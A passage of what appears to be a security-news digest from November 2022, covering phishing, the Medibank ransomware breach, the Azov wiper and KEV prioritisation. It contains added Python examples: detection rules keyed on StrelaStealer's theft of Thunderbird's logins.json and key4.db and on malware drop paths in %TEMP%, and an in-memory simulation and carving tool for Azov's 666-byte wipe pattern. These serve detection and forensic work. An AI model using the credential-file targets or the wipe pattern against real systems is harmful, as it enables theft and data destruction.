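Two of the items above leave concrete file-system artefacts: StrelaStealer reads logins.json and key4.db under the Thunderbird profile directory, and the Amadey/LockBit chain drops its payloads as %TEMP%\<numeric dir>\dd.ps1, cc.ps1 or LBB.exe. Both translate directly into file-telemetry detections. The following Python is an added example, not code from DCSO CyTec, ASEC or BleepingComputer, that applies both rules to constructed Sysmon-style events; the event field names, the trusted-process list and the six-digit minimum for the numeric directory are assumptions.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape. "FileCreate" stands in
# for Sysmon Event ID 11; "FileAccess" stands in for an EDR file-read event,
# which Sysmon itself does not emit. All records are invented for the example.
SAMPLE_EVENTS = [
    {"event": "FileAccess",
     "image": r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Thunderbird\Profiles\x1y2z3.default-release\logins.json"},
    {"event": "FileAccess",
     "image": r"C:\Users\alice\AppData\Local\Temp\invoice.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Thunderbird\Profiles\x1y2z3.default-release\key4.db"},
    {"event": "FileCreate",
     "image": r"C:\Users\alice\AppData\Local\Temp\invoice.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\1000019041\cc.ps1"},
    {"event": "FileCreate",
     "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\MSI4a2b.tmp"},
    {"event": "FileCreate",
     "image": r"C:\Users\alice\AppData\Local\Temp\invoice.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\1000020001\LBB.exe"},
]

# %APPDATA% expands to <profile>\AppData\Roaming, so the profile directory
# named in the StrelaStealer write-up lives under that path.
THUNDERBIRD_PROFILE_RE = re.compile(r"\\AppData\\Roaming\\Thunderbird\\Profiles\\", re.I)
THUNDERBIRD_CRED_FILES = {"logins.json", "key4.db"}
# Processes legitimately expected to read the credential store (assumption).
TRUSTED_MAIL_CLIENTS = {"thunderbird.exe"}

# The Amadey/LockBit drop paths have the shape %TEMP%\<long numeric dir>\<payload>.
# Six or more digits is an assumption that covers the observed 10-digit names
# without matching ordinary installer scratch files.
TEMP_NUMERIC_DROP_RE = re.compile(
    r"\\AppData\\Local\\Temp\\\d{6,}\\[^\\]+\.(?:ps1|exe|dll)$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def match_thunderbird_cred_access(ev: dict):
    """A process other than the mail client reading Thunderbird's saved-login files."""
    if ev["event"] != "FileAccess":
        return None
    target = ev["target"]
    if (THUNDERBIRD_PROFILE_RE.search(target)
            and basename(target) in THUNDERBIRD_CRED_FILES
            and basename(ev["image"]) not in TRUSTED_MAIL_CLIENTS):
        return "thunderbird_credential_store_read"
    return None


def match_temp_numeric_drop(ev: dict):
    """A script or executable written into a numeric subdirectory of %TEMP%."""
    if ev["event"] == "FileCreate" and TEMP_NUMERIC_DROP_RE.search(ev["target"]):
        return "temp_numeric_dir_payload_drop"
    return None


RULES = (match_thunderbird_cred_access, match_temp_numeric_drop)


def detect(events):
    """Return (rule name, image, target) for every event some rule matches."""
    hits = []
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                hits.append((name, ev["image"], ev["target"]))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(*hit, sep="\t")
```

The first rule deliberately keys on the reader, not the file: Thunderbird itself touches these files constantly, so the signal is any other image opening them. The second rule is a shape match; pair it with the parent-process chain (a Word process or a document-icon executable, per the ASEC description) before treating it as more than a lead.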


                Phishing threats are increasingly convincing and evasive

                financial
                2022-11-07 https://www.helpnetsecurity.com/2022/11/07/phishing-threats-convincing-evasive-video/

                In this Help Net Security video, Tonia Dudley, VP, CISO at Cofense, provides a look at the various changes seen in the phishing threat landscape. Dudley talks about the impact of credential phishing and business email compromise (BEC), which allow cybercriminals to steal substantial amounts of money from global organizations.

                The post Phishing threats are increasingly convincing and evasive appeared first on Help Net Security.

                "



                Taking cybersecurity investments to the next level

                ciber
                2022-11-07 https://www.helpnetsecurity.com/2022/11/07/cybersecurity-investments-alberto-yepez-forgepoint-capital/

                Recently, the Forgepoint team announced a new alliance with global banking leader Santander to increase cyber investment worldwide, specifically in Europe, Israel, and Latin America. Santander will also be the primary investor in Forgepoint’s next fund, slated for 2023, with a nearly $300 million goal. This was the perfect reason to connect with Alberto Yépez, the co-founder and Managing Director of Forgepoint Capital. In this Help Net Security interview, the former Trident Capital leader offers … More

                The post Taking cybersecurity investments to the next level appeared first on Help Net Security.

                "

                Autosummary:
                - Large market opportunity
                - Differentiated offerings that are hard to replicate
                - Sound go-to-market strategy
                - Ensuring the right team is in place
                - Product market fit as demonstrated by early customer traction
                Israeli and European companies trying to get funding in the US should be able to clearly speak to these fundamentals, demonstrating how they’ll incorporate the US into their go-to-market and growth plans as they partner with investors, form channel alliances, and further develop their businesses. Networking with VCs may also suggest you meet with others and while these introductions may not be directly about fundraising, they can help you get exposure to potential customers, team members, and advisors for input on your tech, business, and model. In this Help Net Security interview, the former Trident Capital leader offers insight into innovation in the cybersecurity market, M&A activity, pitching to VCs, and more. "


                Abusing Microsoft Dynamics 365 Customer Voice in phishing attacks

                financial industry
                2022-11-07 https://securityaffairs.co/wordpress/138147/cyber-crime/microsoft-dynamics-365-customer-voice-phishing.html

                Researchers uncovered a campaign abusing Microsoft Dynamics 365 Customer Voice to steal credentials from victims. Microsoft’s Dynamics 365 Customer Voice product allows organizations to gather customer feedback; it is used to conduct customer satisfaction surveys. Researchers from cybersecurity firm Avanan uncovered a campaign abusing Microsoft Dynamics 365 Customer Voice to steal credentials from the […]

                The post Abusing Microsoft Dynamics 365 Customer Voice in phishing attacks appeared first on Security Affairs.

                "

                Autosummary: Below are the suggestions provided by the experts:
                - Always hover over all URLs, even those not in the email body
                - When receiving an email with a voicemail, ensure this is a typical type of email received before thinking of engaging
                - If ever unsure about an email, ask the original sender "


                Robin Banks Phishing Service for Cybercriminals Returns with Russian Server

                financial ciber
                2022-11-07 https://thehackernews.com/2022/11/robin-banks-phishing-service-for.html
                A phishing-as-a-service (PhaaS) platform known as Robin Banks has relocated its attack infrastructure to DDoS-Guard, a Russian provider of bulletproof hosting services. The switch comes after "Cloudflare disassociated Robin Banks phishing infrastructure from its services, causing a multi-day disruption to operations," according to a report from cybersecurity company IronNet. Robin Banks was "

                Autosummary: "


                Medibank won’t pay the ransom for data stolen in breach

                financial
                2022-11-07 https://www.helpnetsecurity.com/2022/11/07/medibank-ransom/

                Australian health insurance provider Medibank has announced it won’t be paying the ransom to the criminal(s) who stole data of 9.7 million of its current and former customers. “Based on the extensive advice we have received from cybercrime experts we believe there is only a limited chance paying a ransom would ensure the return of our customers’ data and prevent it from being published. In fact, paying could have the opposite effect and encourage the … More

                The post Medibank won’t pay the ransom for data stolen in breach appeared first on Help Net Security.

                "



                Ransomware gang threatens to release stolen Medibank data

                financial exploits
                2022-11-07 https://www.bleepingcomputer.com/news/security/ransomware-gang-threatens-to-release-stolen-medibank-data/
                A ransomware gang that some believe is a relaunch of REvil and others track as BlogXX has claimed responsibility for last month's ransomware attack against Australian health insurance provider Medibank Private Limited. [...] "

                Autosummary: The complete rundown of data Medibank believes was exposed in the breach includes the following:
                - Name, date of birth, address, phone number, and email address for approximately 9.7 million current and former customers and authorized representatives
                - Medicare numbers (but not expiry dates) for ahm health insurance (ahm) customers
                - Passport numbers (but not expiry dates) and visa details for international student customers
                - Health claims data for roughly 480,000 Medibank, ahm, and international customers
                - Health provider details, including names, provider numbers, and addresses
                Medibank added that it also believes the cybercriminals behind the October attack have not gained access to financial information (credit card and banking details), primary identity documents (e.g., driver's licenses), or health claims data for extras services (like dental, physio, optical and psychology). "


                Medibank refuses to pay ransom after 9.7 million health insurance customers have their data stolen

                financial
                2022-11-07 https://www.bitdefender.com/blog/hotforsecurity/medibank-refuses-to-pay-ransom-after-9-7-million-health-insurance-companies-have-their-data-stolen/
                Embattled Australian health insurer Medibank says that it will not pay a ransom to cyber extortionists who stole the personal data of almost ten million customers. Read more in my article on the Hot for Security blog. "

                Autosummary: Last month attackers stole the personal details (including names, addresses, dates of birth, and phone numbers) of approximately 9.7 million current and former customers. "


                Medibank Refuses to Pay Ransom After 9.7 Million Customers Exposed in Ransomware Hack

                financial exploits ransomware
                2022-11-07 https://thehackernews.com/2022/11/medibank-refuses-to-pay-ransom-after-97.html
                Australian health insurer Medibank today confirmed that personal data belonging to around 9.7 million of its current and former customers were accessed following a ransomware incident. The attack, according to the company, was detected in its IT network on October 12 in a manner that it said was "consistent with the precursors to a ransomware event," prompting it to isolate its systems, but not "



                Robin Banks phishing-as-a-service platform continues to evolve

                financial ransomware
                2022-11-07 https://securityaffairs.co/wordpress/138199/cyber-crime/robin-banks-phaas.html

                The phishing-as-a-service (PhaaS) platform Robin Banks migrated its infrastructure to DDoS-Guard, a Russian bulletproof hosting service. Robin Banks was originally hosted by Cloudflare, but in July the company disassociated the Robin Banks phishing infrastructure from its services after being informed. The move caused a multi-day disruption to PhaaS operations, then the administrators […]

                The post Robin Banks phishing-as-a-service platform continues to evolve appeared first on Security Affairs.

                "

                Autosummary: “Robin Banks’ heavy reliance on open-source code and off-the-shelf tooling showcases just how low the barrier-to-entry is to not only conducting phishing attacks, but also to becoming a service provider and creating a PhaaS platform for others to use.” "


                Maple Leaf Foods suffers outage following weekend cyberattack

                ciber
                2022-11-07 https://www.bleepingcomputer.com/news/security/maple-leaf-foods-suffers-outage-following-weekend-cyberattack/
                Maple Leaf Foods confirmed on Sunday that it experienced a cybersecurity incident causing a system outage and disruption of operations. [...] "

                Autosummary: "The outage is creating some operational and service disruptions that vary by business unit, plant, and site," reads the statement. "


                Azov Ransomware is a wiper, destroying data 666 bytes at a time

                exploits ransomware
                2022-11-07 https://www.bleepingcomputer.com/news/security/azov-ransomware-is-a-wiper-destroying-data-666-bytes-at-a-time/
                The Azov Ransomware continues to be heavily distributed worldwide, now proven to be a data wiper that intentionally destroys victims' data and infects other programs. [...] "

                Autosummary: "This works in a loop, so the wiped file structure would look like this: 666 bytes of garbage, 666 bytes original, 666 bytes of garbage, 666 bytes original, etc…" [Figure: corrupting data in alternating 666-byte runs (source: Jiří Vinopal)] To make matters even worse, the data wiper will infect, or "backdoor," other 64-bit executables on the Windows device whose file path does not contain the following strings: :\Windows \ProgramData\ \cache2\entries \Low\Content. "
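The alternating 666-byte layout described above has a forensic consequence worth spelling out: the first 666 bytes of every file (and with them any header or magic bytes) are destroyed, but close to half of the content between the garbage runs survives. The following Python is an added example, not code from the researcher or from the malware, that models that layout on an in-memory byte string and carves the intact runs back out. The 666-byte run length comes from the write-up; the sample data and the injectable rng parameter (so the wipe is reproducible) are constructed for the example.

```python
import os

BLOCK = 666  # run length reported for Azov: alternating garbage / untouched data


def simulate_azov_wipe(original: bytes, block: int = BLOCK, rng=os.urandom) -> bytes:
    """Model of the reported on-disk result: starting at offset 0, every other
    <block>-byte run is overwritten with garbage and the runs between them are
    left as they were. This reproduces the described layout only; it is not the
    malware's code. rng(n) must return n bytes."""
    out = bytearray(original)
    for start in range(0, len(original), 2 * block):
        end = min(start + block, len(original))
        out[start:end] = rng(end - start)
    return bytes(out)


def surviving_runs(wiped: bytes, block: int = BLOCK):
    """Offsets and contents of the runs the pattern leaves intact (the odd-numbered
    runs, counting from 0). This is the carving step for a wiped file."""
    return [(off, wiped[off:off + block]) for off in range(block, len(wiped), 2 * block)]


def recoverable_fraction(size: int, block: int = BLOCK) -> float:
    """Share of a <size>-byte file that the pattern does not touch."""
    if size <= 0:
        return 0.0
    intact = sum(min(block, size - off) for off in range(block, size, 2 * block))
    return intact / size


def carve_to_files(wiped: bytes, out_dir: str, stem: str, block: int = BLOCK) -> list:
    """Write each intact run to <out_dir>/<stem>.<offset>.bin and return the paths,
    so string extraction or object carving can run on the surviving fragments."""
    os.makedirs(out_dir, exist_ok=True)
    paths = []
    for off, chunk in surviving_runs(wiped, block):
        p = os.path.join(out_dir, f"{stem}.{off}.bin")
        with open(p, "wb") as f:
            f.write(chunk)
        paths.append(p)
    return paths


if __name__ == "__main__":
    sample = bytes(range(256)) * 10          # constructed 2560-byte "document"
    wiped = simulate_azov_wipe(sample)
    for off, chunk in surviving_runs(wiped):
        print(f"intact run at offset {off}: {len(chunk)} bytes")
    print(f"recoverable: {recoverable_fraction(len(sample)):.1%}")
```

The carved fragments are not a usable file: every file type's header sits in the first destroyed run, so type identification has to rely on mid-file content (strings, embedded objects, compression signatures), and files shorter than 666 bytes are lost entirely. Restoring from backups that predate the wipe is the only full recovery.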


                A cyberattack blocked the trains in Denmark

                ciber
                2022-11-06 https://securityaffairs.co/wordpress/138127/cyber-crime/cyberattack-blocked-trains-denmark.html

                At the end of October, a cyber attack caused the trains operated by DSB to stop in Denmark over the weekend; threat actors hit a third-party IT service provider. The attack hit the Danish company Supeo […]

                The post A cyberattack blocked the trains in Denmark appeared first on Security Affairs.

                "



                LockBit 3.0 gang claims to have stolen data from Kearney & Company

                ransomware
                2022-11-06 https://securityaffairs.co/wordpress/138136/cyber-crime/lockbit-ransomware-kearney-company.html

                The ransomware group LockBit claimed to have stolen data from consulting and IT services provider Kearney & Company. Kearney is a CPA firm that provides services across the financial management spectrum to government entities. The company provides audit, consulting and IT services to the United States government. It has helped the Federal Government improve its […]

                The post LockBit 3.0 gang claims to have stolen data from Kearney & Company appeared first on Security Affairs.

                "



                Zero-day are exploited on a massive scale in increasingly shorter timeframes

                exploits
                2022-11-05 https://securityaffairs.co/wordpress/138100/security/treat-actors-zero-day.html

                Microsoft warns of an uptick among threat actors increasingly using publicly-disclosed zero-day exploits in their attacks. According to the Digital Defense Report published by Microsoft, threat actors are increasingly leveraging publicly-disclosed zero-day vulnerabilities to target organizations worldwide. The researchers noticed a reduction in the time between the announcement of a vulnerability and the commoditization of […]

                The post Zero-day are exploited on a massive scale in increasingly shorter timeframes appeared first on Security Affairs.

                "



                Outmaneuvering cybercriminals by recognizing mobile phishing threats’ telltale markers

                financial ciber
                2022-11-04 https://www.helpnetsecurity.com/2022/11/04/smartphones-phishing-attacks/

                Preventative medicine has long been recognized as a vital approach in safeguarding our physical health. We take a variety of tests and assessments so that doctors can uncover key biological markers that may indicate the potential development of certain diseases or illnesses as early as possible. Cybercrime in the digital world has distinguishing features, too, and we can react to cyberattacks by neutralizing the source. As phishing attacks soar in frequency and sophistication and are … More

                The post Outmaneuvering cybercriminals by recognizing mobile phishing threats’ telltale markers appeared first on Help Net Security.

                "

                Autosummary: This makes sense: smartphones are our main connection to our digital endpoints – social media, email, apps, SMS, etc. – and the sophistication of today’s phishing criminals means that even the most switched-on and savvy users can fall prey to attacks. However, this takes time and a major shift in mindset, so more than anything we need to deploy a technology that can do the detection, decoding, and everything in between. "


                The most frequently reported vulnerability types and severities

                exploits
                2022-11-04 https://www.helpnetsecurity.com/2022/11/04/most-frequently-reported-vulnerability-types-severities-video/

                Bishop Fox collected and analyzed publicly disclosed reports from January to July 2022 to better understand the most frequently reported vulnerability types, the highest-disclosed bounties, and more. In this Help Net Security video, Carlos Yanez, Security Consultant at Bishop Fox, talks about the most frequently reported vulnerability types and severities.

                The post The most frequently reported vulnerability types and severities appeared first on Help Net Security.

                "

                Autosummary: "


                Axiomtek iNA200 protects OT assets against malware and cyber-attacks

                exploits
                2022-11-04 https://www.helpnetsecurity.com/2022/11/04/axiomtek-ina200/

                Axiomtek has released the iNA200, a DIN-rail cybersecurity gateway for operational technology (OT) network security. The iNA200 is powered by the Intel Atom x6212RE or x6414RE processor (Elkhart Lake) and has one DDR4-3200 SO-DIMM for up to 32GB of system memory. For demanding rugged environments, this fanless IIoT edge gateway comes with a wide operating temperature range of -40°C to 70°C and supports wide power input of 9 to 36 VDC with dual power input. … More

                The post Axiomtek iNA200 protects OT assets against malware and cyber-attacks appeared first on Help Net Security.

                "

                Autosummary: More I/O options include one HDMI, two USB 3.0 ports, one COM port (RS-232/422/485) with DB9 type, one COM port (RS-485) with 3 pin terminal block, one tact switch, four antenna holes, one power input connector, and one console port (RJ-45). "


                As Twitter brings on $8 fee, phishing emails target verified accounts

                financial
                2022-11-04 https://www.bleepingcomputer.com/news/security/as-twitter-brings-on-8-fee-phishing-emails-target-verified-accounts/
                As Twitter announces plans to charge users $8 a month for Twitter Blue and verification under Elon Musk's management, BleepingComputer has come across several phishing emails targeting verified users.  [...] "

                Autosummary: Other than receiving a blue tick following successful verification, paid users are expected to get "priority in replies, mentions & search," fewer ads, and will be able to post longer multimedia content: "You will also get: - Priority in replies, mentions & search, which is essential to defeat spam/scam - Ability to post long video & audio - Half as many ads" (Elon Musk, @elonmusk, November 1, 2022). Following Musk's tweets, BleepingComputer observed newer phishing campaigns emerging with threat actors now targeting verified accounts. "


                CISA Warns of Critical Vulnerabilities in 3 Industrial Control System Software

                industry
                2022-11-04 https://thehackernews.com/2022/11/cisa-warns-of-critical-vulnerabilities.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published three Industrial Control Systems (ICS) advisories about multiple vulnerabilities in software from ETIC Telecom, Nokia, and Delta Industrial Automation. Prominent among them is a set of three flaws affecting ETIC Telecom's Remote Access Server (RAS), which "could allow an attacker to obtain sensitive information and "

                Autosummary: "


                Attackers leverage Microsoft Dynamics 365 to phish users

                industry
                2022-11-04 https://www.helpnetsecurity.com/2022/11/04/microsoft-dynamics-365-phishing/

                Attackers are abusing Microsoft Dynamics 365 Customer Voice to evade email filters and deliver phishing emails into Microsoft users’ inboxes, Avanan researchers are warning. The attack: Microsoft Dynamics 365 is a suite of enterprise resource planning (ERP) and customer relationship management (CRM) applications. Customer Voice is one of these applications, and it’s used for collecting data and feedback from customers via surveys, phone calls, etc. The attackers have created Microsoft Dynamics 365 Customer Voice accounts … More

                The post Attackers leverage Microsoft Dynamics 365 to phish users appeared first on Help Net Security.

                "

                Autosummary: Similarly, phishers have been known to exploit Facebook Ads, QuickBooks, Lucidchart, Adobe Cloud, and many other legitimate services. "


                Researchers Detail New Malware Campaign Targeting Indian Government Employees

                exploits government
                2022-11-04 https://thehackernews.com/2022/11/researchers-detail-new-malware-campaign.html
                The Transparent Tribe threat actor has been linked to a new campaign aimed at Indian government organizations with trojanized versions of a two-factor authentication solution called Kavach. "This group abuses Google advertisements for the purpose of malvertising to distribute backdoored versions of Kavach multi-factor authentication (MFA) applications," Zscaler ThreatLabz researcher Sudeep Singh said "

                Autosummary: The latest attack chain is not the first time the threat actor has set its sights on Kavach (meaning "armor" in Hindi), a mandatory app required by users with email addresses on the @gov.in and @nic.in domains to sign in to the email service as a second layer of authentication. "


                Robin Banks phishing service returns to steal banking accounts

                financial
                2022-11-04 https://www.bleepingcomputer.com/news/security/robin-banks-phishing-service-returns-to-steal-banking-accounts/
                The Robin Banks phishing-as-a-service (PhaaS) platform is back in action with infrastructure hosted by a Russian internet company that offers protection against distributed denial-of-service (DDoS) attacks. [...] "

                Autosummary: Robin Banks faced operational disruption in July 2022, when researchers at IronNet exposed the platform as a highly threatening phishing service targeting Citibank, Bank of America, Capital One, Wells Fargo, PNC, U.S. Bank, Santander, Lloyds Bank, and the Commonwealth Bank. "


                Ransomware rages on – Week in security with Tony Anscombe

                exploits
                2022-11-04 https://www.welivesecurity.com/videos/ransomware-rages-on-week-security-tony-anscombe/

                This week's news offered fresh reminders of the threat that ransomware poses for businesses and critical infrastructure worldwide

                The post Ransomware rages on – Week in security with Tony Anscombe appeared first on WeLiveSecurity

                "

                Autosummary: "


                Cybersecurity recovery is a process that starts long before a cyberattack occurs

                ciber
                2022-11-03 https://www.helpnetsecurity.com/2022/11/03/cybersecurity-recovery/

                While most organizations have insurance in case of cyberattacks, the premium they pay depends on how the business identifies, detects and responds to these attacks – and on how quickly they recover. Organizations that can prove their resiliency and compliance with NIS guidelines – showing that they will be able to recover quickly in the event of an attack – could reduce their risks and their insurance premiums. A great cybersecurity recovery program can save … More

                The post Cybersecurity recovery is a process that starts long before a cyberattack occurs appeared first on Help Net Security.

                "

                Autosummary: An ever-evolving threat: Organizations are racing to stay ahead of cyber criminals, and as a result, we see businesses investing a lot of money in identifying and detecting attacks, in preventing attacks in the first place, and in responding to live attacks. Having the right IT architecture, security and recovery process in place: Organizations with the right IT architecture, recovery time and point objectives, and security policies are at a considerable advantage when it comes to the recovery process. "


                Bitdefender Chat Protection defends users from cybercriminal activities targeting mobile devices

                ciber
                2022-11-03 https://www.helpnetsecurity.com/2022/11/03/bitdefender-chat-protection/

                Bitdefender unveiled real-time chat protection capabilities for mobile instant messaging applications. Bitdefender Chat Protection immediately alerts users if malicious links are received or sent during live sessions over the world’s most popular chat applications, including WhatsApp, Facebook Messenger, Telegram and Discord. The new capabilities help protect users from increased cybercriminal activity targeting mobile devices. Chat Protection is incorporated into Bitdefender Mobile Security for Android through Bitdefender Scam Alert technology, used … More

                The post Bitdefender Chat Protection defends users from cybercriminal activities targeting mobile devices appeared first on Help Net Security.

                "

                Autosummary: Chat Protection is incorporated into Bitdefender Mobile Security for Android through Bitdefender Scam Alert technology, used by consumers worldwide for monitoring, detecting and stopping link-based attacks delivered via messaging applications, notifications, and SMS text messages. "


                Azul Vulnerability Detection uncovers known vulnerabilities in Java applications

                exploits
                2022-11-03 https://www.helpnetsecurity.com/2022/11/03/azul-vulnerability-detection/

                Azul has released Azul Vulnerability Detection, a new SaaS product that continuously detects known security vulnerabilities that exist in Java applications. By eliminating false positives and with no performance impact, Azul Vulnerability Detection is ideal for in-production use and addresses the increasing enterprise risk around software supply chain attacks. According to Gartner, “by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021” (Gartner, Emerging Tech: … More

                The post Azul Vulnerability Detection uncovers known vulnerabilities in Java applications appeared first on Help Net Security.

                "

                Autosummary: According to Gartner, “by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021” (Gartner, Emerging Tech: A Software Bill of Materials is Critical to Software Supply Chain Management, Mark Driver, September 6, 2022). "


                Nucleus Security CISA KEV Enrichment Dashboard provides insights into vulnerability prioritization

                exploits
                2022-11-03 https://www.helpnetsecurity.com/2022/11/03/nucleus-security-enrichment-dashboard/

                Nucleus Security has launched the CISA KEV Enrichment Dashboard, a free tool that lets vulnerability researchers view the known exploited vulnerabilities identified by CISA and layer additional enrichment intelligence onto their vulnerability prioritization. The dashboard lists the entries of the CISA Known Exploited Vulnerabilities (KEV) Catalog, enriched with CVSS, EPSS and GreyNoise threat intelligence. There are approximately 198,000 Common Vulnerabilities and Exposures (CVE) entries, of which only … More

                The post Nucleus Security CISA KEV Enrichment Dashboard provides insights into vulnerability prioritization appeared first on Help Net Security.

                "

                Autosummary: Through their research, and the development of the CISA KEV Enrichment Dashboard, Nucleus Security has made the following observations as of October 2022. Most exploited vendors: the top five most exploited vendors on the CISA KEV list are Microsoft, Adobe, Cisco, Apple and Google, which together account for more than 53% of all KEV entries. "
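                The enrichment the dashboard performs is a join: take the KEV catalog (which only says "exploited in the wild" and gives a remediation due date), attach an EPSS probability and a CVSS base score to each entry, and rank. The script below is an added example of that join, written for this page; it is not Nucleus Security's code and it does not fetch the live feeds. The KEV and EPSS inputs are constructed inline in the shape of the real feeds (CISA's KEV JSON field names and the FIRST EPSS CSV columns), with placeholder CVE IDs and invented scores, and one CVE deliberately has no EPSS row. The ranking order (overdue deadline, known ransomware use, EPSS, then CVSS) is a design choice for the example, not the dashboard's documented logic.

```python
import csv
import io
import json
from collections import Counter
from datetime import date

# Constructed sample in the shape of CISA's KEV JSON feed (field names as CISA publishes them;
# the CVE IDs and values are placeholders, not real catalog entries).
KEV_JSON = """{"vulnerabilities": [
  {"cveID": "CVE-2022-90001", "vendorProject": "Microsoft", "product": "Windows",
   "dateAdded": "2022-10-11", "dueDate": "2022-11-01", "knownRansomwareCampaignUse": "Known"},
  {"cveID": "CVE-2022-90002", "vendorProject": "Adobe", "product": "Acrobat",
   "dateAdded": "2022-10-30", "dueDate": "2022-11-20", "knownRansomwareCampaignUse": "Unknown"},
  {"cveID": "CVE-2022-90003", "vendorProject": "Cisco", "product": "IOS XE",
   "dateAdded": "2022-10-04", "dueDate": "2022-10-25", "knownRansomwareCampaignUse": "Unknown"},
  {"cveID": "CVE-2022-90004", "vendorProject": "Apple", "product": "iOS",
   "dateAdded": "2022-10-25", "dueDate": "2022-11-15", "knownRansomwareCampaignUse": "Unknown"},
  {"cveID": "CVE-2022-90005", "vendorProject": "Google", "product": "Chromium V8",
   "dateAdded": "2022-10-11", "dueDate": "2022-11-01", "knownRansomwareCampaignUse": "Unknown"},
  {"cveID": "CVE-2022-90006", "vendorProject": "Microsoft", "product": "Exchange Server",
   "dateAdded": "2022-11-01", "dueDate": "2022-11-22", "knownRansomwareCampaignUse": "Unknown"},
  {"cveID": "CVE-2022-90007", "vendorProject": "Atlassian", "product": "Confluence",
   "dateAdded": "2022-11-02", "dueDate": "2022-11-30", "knownRansomwareCampaignUse": "Unknown"}
]}"""

# Constructed sample in the shape of the FIRST EPSS CSV export (columns cve,epss,percentile).
# CVE-2022-90004 is deliberately absent to show how a missing score is handled.
EPSS_CSV = """cve,epss,percentile
CVE-2022-90001,0.97,0.999
CVE-2022-90002,0.12,0.950
CVE-2022-90003,0.45,0.985
CVE-2022-90005,0.60,0.990
CVE-2022-90006,0.05,0.900
CVE-2022-90007,0.30,0.975
"""

# Constructed CVSS v3 base scores keyed by CVE ID (placeholder values).
CVSS = {"CVE-2022-90001": 7.8, "CVE-2022-90002": 9.8, "CVE-2022-90003": 8.8,
        "CVE-2022-90004": 8.8, "CVE-2022-90005": 8.8, "CVE-2022-90006": 7.5,
        "CVE-2022-90007": 9.8}


def load_kev(text):
    """Parse the KEV feed and return its list of vulnerability records."""
    return json.loads(text)["vulnerabilities"]


def load_epss(text):
    """Parse an EPSS CSV export into {cve_id: probability}."""
    return {row["cve"]: float(row["epss"]) for row in csv.DictReader(io.StringIO(text))}


def enrich(kev, epss, cvss, today):
    """Join each KEV entry with its EPSS and CVSS scores and derive remediation state."""
    rows = []
    for v in kev:
        cve = v["cveID"]
        rows.append({
            "cve": cve,
            "vendor": v["vendorProject"],
            "epss": epss.get(cve, 0.0),  # no EPSS row: record as unscored (0.0), not as safe
            "cvss": cvss.get(cve),
            "overdue": today > date.fromisoformat(v["dueDate"]),  # KEV remediation due date passed
            "ransomware": v.get("knownRansomwareCampaignUse") == "Known",
        })
    return rows


def prioritize(rows):
    """Order KEV entries for remediation.

    Every row is already exploited in the wild (that is what KEV membership means), so CVSS alone
    is a weak tiebreaker: it would rank the 9.8 with a 12% EPSS above the 7.8 used by ransomware.
    Sort by overdue deadline, then known ransomware use, then EPSS, then CVSS.
    """
    return sorted(rows, key=lambda r: (not r["overdue"], not r["ransomware"],
                                       -r["epss"], -(r["cvss"] or 0.0)))


def vendor_share(kev, top_n=5):
    """Fraction of KEV entries attributable to the top_n vendors ('most exploited vendors')."""
    counts = Counter(v["vendorProject"] for v in kev)
    return sum(c for _, c in counts.most_common(top_n)) / len(kev)


def ranked_cves(today=date(2022, 11, 3)):
    """CVE IDs from the sample data in remediation order, as of `today`."""
    rows = enrich(load_kev(KEV_JSON), load_epss(EPSS_CSV), CVSS, today)
    return [r["cve"] for r in prioritize(rows)]


if __name__ == "__main__":
    for r in prioritize(enrich(load_kev(KEV_JSON), load_epss(EPSS_CSV), CVSS, date(2022, 11, 3))):
        print(f"{r['cve']} {r['vendor']:<10} epss={r['epss']:.2f} cvss={r['cvss']} "
              f"overdue={r['overdue']} ransomware={r['ransomware']}")
    print(f"top-5 vendor share: {vendor_share(load_kev(KEV_JSON)):.0%}")
```

                Run as-is, the three overdue entries come out first, with the ransomware-linked one ahead of the two higher-CVSS ones; among the rest, the 9.8 with a 12% EPSS falls below a 9.8 with a 30% EPSS, and the entry with no EPSS row lands last. That last point is the caveat worth keeping: an absent EPSS score means FIRST has not scored it yet, so anything ranked low only because of a 0.0 should be reviewed by hand rather than deferred.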


                IoT cybersecurity is slowly gaining mainstream attention

                industry ciber
                2022-11-03 https://www.helpnetsecurity.com/2022/11/03/iot-devices-cybersecurity/

                In this interview for Help Net Security, Jason Oberg, CTO at Cycuity, talks about the cybersecurity of IoT devices, from production to usage, and how far we have come in securing them. IoT has been part of our reality for quite some time, but what about the security of these devices? Is it becoming a priority? We’ve seen the concern about and prioritization of IoT security growing; this is due both to the growing popularity of these … More

                The post IoT cybersecurity is slowly gaining mainstream attention appeared first on Help Net Security.

                "

                Autosummary: In this interview for Help Net Security, Jason Oberg, CTO at Cycuity, talks about the cybersecurity of IoT devices, from production to usage, and how far we have come in securing them. That said, we see a shift to making security a key component of the entire development process so that the approach is systematic, predictable, and scalable with the usual development schedule. "


                Black Basta ransomware gang linked to the FIN7 hacking group

                exploits ransomware
                2022-11-03 https://www.bleepingcomputer.com/news/security/black-basta-ransomware-gang-linked-to-the-fin7-hacking-group/
                Security researchers at Sentinel Labs have uncovered evidence that links the Black Basta ransomware gang to the financially motivated hacking group FIN7, also known as "Carbanak." [...] "

                Autosummary: A 2022 Mandiant report explained that FIN7 was working with various ransomware gangs, including Maze, Ryuk, Darkside, and BlackCat/ALPHV, apparently carrying out the initial compromise. "


                OPERA1ER APT Hackers Targeted Dozens of Financial Organizations in Africa

                financial
                2022-11-03 https://thehackernews.com/2022/11/researchers-detail-opera1er-apt-attacks.html
                A French-speaking threat actor dubbed OPERA1ER has been linked to a series of more than 30 successful cyber attacks aimed at banks, financial services, and telecom companies across Africa, Asia, and Latin America between 2018 and 2022. According to Singapore-headquartered cybersecurity company Group-IB, the attacks have led to thefts totaling $11 million, with actual damages estimated to be as "

